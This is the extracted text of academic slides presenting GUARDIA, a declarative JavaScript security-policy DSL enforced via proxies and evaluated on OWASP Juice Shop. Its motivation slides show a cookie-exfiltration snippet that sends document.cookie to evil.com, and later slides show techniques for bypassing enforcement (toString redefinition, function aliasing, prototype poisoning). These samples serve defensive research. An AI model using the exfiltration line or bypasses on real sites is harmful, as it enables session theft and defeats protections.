Declaratively Specifying Security Policies For Web Applications Angel Luis Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.ac.be 1 

Motivation Browser 0 0 0 Search 2 Stock services Weather information Advertisement … Composed 

Browser 0 0 0 Search … … Window Document Location History … let evilImage = document.createElement('img'); evilImage.src = ‘http://evil.com?user='+document.cookie; Motivation 3 

let evilImage = document.createElement('img'); evilImage.src = ‘http://evil.com/takeThis?user='+document.cookie; A policy that restrict which URLs are allowed in the src of images Security policy 4 A security policy restricts application behavior to prevent vulnerabilities/attacks. 

Security policies at browser level 5 default-src ‘self’ good.com; script-src ’self’; Content Security Policy my.cite.com good.com my.cite.com Allowed <script src=“//attacker.com/ code.js”> attacker.com Blocked 

Security policies at browser level script-src ‘self’ https://whitelisted.com; object-src none; JSONP-like endpoint in whitelist ">'>

How can application-dependent security policies be expressed? 7 

8 enforcePolicy({target: document, method: ‘createElement’}, function(invocation){ var str = stringOf(invocation, 0); if(str.indexOf(‘iframe’)>=0){ return; }else invocation.proceed(); } ); Related works J. Magazinius, P. H. Phung, and D. Sands. Safe Wrappers and Sane Policies for Self Protecting JavaScript. In Informatics, pages 239–255. Berlin, Heidel- berg, 2012 • Flexible. • Programmers have to write code to enforce the policy. • Programmers have no control in the execution order of the policies Safe Wrappers and Sane Policies for Self Protecting JavaScript 

9 around(document.createElement, function (c : K, tag : U) { let elt : U = uCall(document, c, tag);
 if (elt.nodeName == "IFRAME") throw ’err’; else return elt; }); Related works L. A. Meyerovich and B. Livshits. ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser. pages 481–496. IEEE, 2010. • Flexible. • Capable of express wide range of policies. • Programmers have to write code to enforce the policy. • Limited portability. ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser 

GUARDIA Our approach 10 Policies should be composable. Policies should be easy to develop. Programmers should be out of concern about the enforcement mechanism. 

Construct Description Allow(arr : Array) => TBase Limit the execution to the supplied properties Deny(arr : Array) => TBase Deny the execution of the supplied properties Not(p: TBase) => TBase Negates the result of the policy given as parameter And(pArr: Array) => TBase Perform logical and using policies given as parameters Or(pArr: Array) => TBase Perform logical or using policies given as parameters ParamAt((...ps)=> Boolean, pIdx: Number, arr : Array) => TBase Apply a function to one parameter of the actual execution StateFnParam((...ps)=> Boolean,s: String, arr : Array) => TBase Apply a function to one state during an execution step API of GUARDIA concepts 11 

A policy that restrict which URLs are allowed in the src of images Security policy specification with GUARDIA 12 let whiteListedSrc = ac.Or(ac.And(ac.Allow(['src']), ac.ParamInList(0,whiteURLs)), ac.Not(ac.Allow([‘src']))); 

Can JavaScript’s reflective capabilities be employed to enforce security policies without compromising the transparency and tamper-proofness? 13 

14 Enforcement mechanism The enforcement mechanism should be portable across different platforms. The enforcement mechanism should be tamper-proof. The enforcement mechanism should be transparent. 

Document Proxy Attacker Document Attacker ? Attacker model and enforcement mechanism Monitor the execution to uphold security policies 15 All loaded code sources are potentially malicious! 

window document location history … window = makeSecureProxy(window); … Problems with browser’s builtin objects 16 Unable to override builtin objects Builtin objects 

Built-in Regular Function proxies wrap every method of the target Object proxy wrap the entire target GUARDIA’s enforcement approach 17 

{ whenRead : [], readListeners : [], whenWrite : [], writeListeners: [] } … { get: function(tar, prop, rec) //security policy enforcement return Reflect.get(tar, prop, rec); }, set: function(tar, prop, val, rec){ //security policy enforcement return Reflect.set(tar, prop, val, rec); } } Policy configuration object Deployment of security policies 18 … { apply: function (targetFn, thisArg, arglist) { //security enforcement return targetFn.apply(thisArg, arglist); } } 

Policy configuration object Enforcing policies in GUARDIA 19 ac.installPolicy({ whenRead: [ac.Not(ac.And(ac.Allow([‘createElement']), ac.ParamAt(equals, 0, 'iframe')))] }).on(document) 

var liarObj = { value: 'div', toString: function(){ var t = this.value; this.value = 'iframe'; return t; } } console.log(liarObj.toString()); //div console.log(liarObj.toString()); //iframe toString and valueOf redefinition 20 Example of toString redefinition Not( And( Allow([‘createElement’]), ParamAt(equals, 0, ’iframe’)) Not( And( Allow([‘createElement’]), ParamAt(equals, stringOf(0), ’iframe’)) Gets the string value once! 

Function aliasing 21 Attacker’s code var openCopy = window.open … installPolicy({ whenRead: [Deny([‘open’])] }).on(window) … openCopy.call(window,’bad.com’) Code for security Security bypassed … … First executed script 

Prototype poisoning 22 var allowedUrls = { ‘valid.com’ : true } function isAllowed(url){ return allowedUrls[url] === true; } isAllowed(‘invalid.com’); //false Object.prototype[‘invalid.com’] = true; isAllowed(‘invalid.com’); //true Object.seal(Object.prototype); ECMAScript 5 features that allows prevent unintended changes in objects 

1 Injection 2 Broken Authentication and Session Management 3 Cross Site Scripting 4 Insecure Direct Object Reference 5 Security Misconfiguration 6 Sensitive Data Exposure 7 Missing Function Level Access Control 8 Cross Site Request Forgery 9 Using Components with Known Vulnerabilities 10 Unvalidated Redirects and Forwards https://www.owasp.org OWASP Top ten vulnerabilities 23 

Attack type Security policy HV [6] Yu et al. [28] Phung et al. [20] ML [15] GUARDIA Forgery Limited number of popup windows opened (P1) 3 3 3 3 3 Forgery No popup windows without location and status bar 3 3 Resource abuse Prevent abuse of resources like modal dialogues (P2) 3 3 3 3 Restoring built-ins from frames Disallow dynamic iframe creation (P3) 3 3 3 Information leakage Disabling page redirects after document.cookie read (P4) 3 3 3 3 3 Information leakage Allowing redirections for a whitelist of URLs (P5) 3 3 3 Information leakage Restrict XMLHttpRequest to secure connections and whitelist URLs (P6) 3 3 Information leakage Disallow setting of src property 3 3 Information leakage Disallow setting of location property 3 3 3 Impersonation XMLHttpRequest is restricted to HTTPS connections (P6) 3 3 Impersonation / Information leakage Disallow open and send methods of XHR object 3 3 3 Man in the middle postMessage can only send to the origins in a whitelist (P7) 3 3 Run arbitrary code*(fix) Disallow string arguments to setInterval & setTimeout (P8) 3 3 Table 1. Comparison of approaches in security policies. Policy numbers P1 to P8 refer to the policies discussed in section 4. Results 24 

OWASP Juice Shop https://juice-shop.herokuapp.com/ Applying GUARDIA to an existing application 25 https://juice-shop.herokuapp.com/#/score-board Vulnerabilities and challenges 

Applying GUARDIA to Juice Shop 26 

Applying GUARDIA to Juice Shop 27 … … … let noAlert = Deny([‘alert’,’prompt','confirm']); … installPolicy({ whenRead: [noAlert], … }).on(window); … 

Conclusion We presented GUARDIA an internal DSL for securing Javascript applications. GUARDIA is agnostic of the underlying enforcement mechanism. GUARDIA is able to express wide range of security policies from related literature. 28 

Declaratively Specifying Security Policies For Web Applications Angel Luis Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.ac.be 29